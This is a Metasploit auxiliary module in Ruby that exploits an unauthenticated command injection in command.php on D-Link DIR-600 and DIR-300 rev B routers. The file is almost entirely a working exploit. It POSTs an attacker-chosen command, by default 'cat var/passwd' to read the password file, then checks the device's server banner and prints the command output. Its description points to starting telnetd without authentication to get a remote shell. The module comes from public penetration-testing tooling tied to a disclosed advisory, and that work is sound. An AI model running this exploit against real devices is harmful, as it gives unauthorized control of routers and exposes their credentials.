
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
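class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Server banner the response must carry before any output is trusted.
  # The dot in the HTTP version is escaped; the original pattern left it
  # unescaped, so it matched any character rather than a literal '.'.
  SERVER_BANNER = /Linux, HTTP\/1\.1, DIR/.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution',
      'Description' => %q{
        This module exploits an OS Command Injection vulnerability in some D-Link
        Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in
        command.php, which is accessible without authentication. This module has been
        tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.
        In order to get a remote shell the telnetd could be started without any
        authentication.
      },
      'Author'      => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'OSVDB', '89861' ],
          [ 'EDB', '24453' ],
          [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
          [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 04 2013'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])
      ])
  end

  # Posts the configured CMD to /command.php and prints whatever the device
  # returns.
  #
  # Returns nothing. The response is only reported when the Server header
  # matches SERVER_BANNER and the status is not 404; anything else is skipped
  # silently. A connection failure is logged with vprint_error and aborts the run.
  def run
    cmd = datastore['CMD']
    print_status("#{rhost}:#{rport} - Sending remote command: #{cmd}")

    begin
      res = send_request_cgi(
        'uri'    => '/command.php',
        'method' => 'POST',
        'data'   => "cmd=#{cmd}; echo end"
      )
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return
    end

    # Fingerprint the responder before interpreting the body; a host that does
    # not identify as the affected device class is ignored.
    return if res.nil?
    return unless res.headers['Server']&.match?(SERVER_BANNER)
    return if res.code == 404

    # The trailing "echo end" acts as a marker that the whole line was run.
    if res.body.include?('end')
      print_good("#{rhost}:#{rport} - Exploited successfully\n")
      print_line("#{rhost}:#{rport} - Command: #{cmd}\n")
      print_line("#{rhost}:#{rport} - Output: #{res.body}")
    else
      print_error("#{rhost}:#{rport} - Exploit failed")
    end
  end
end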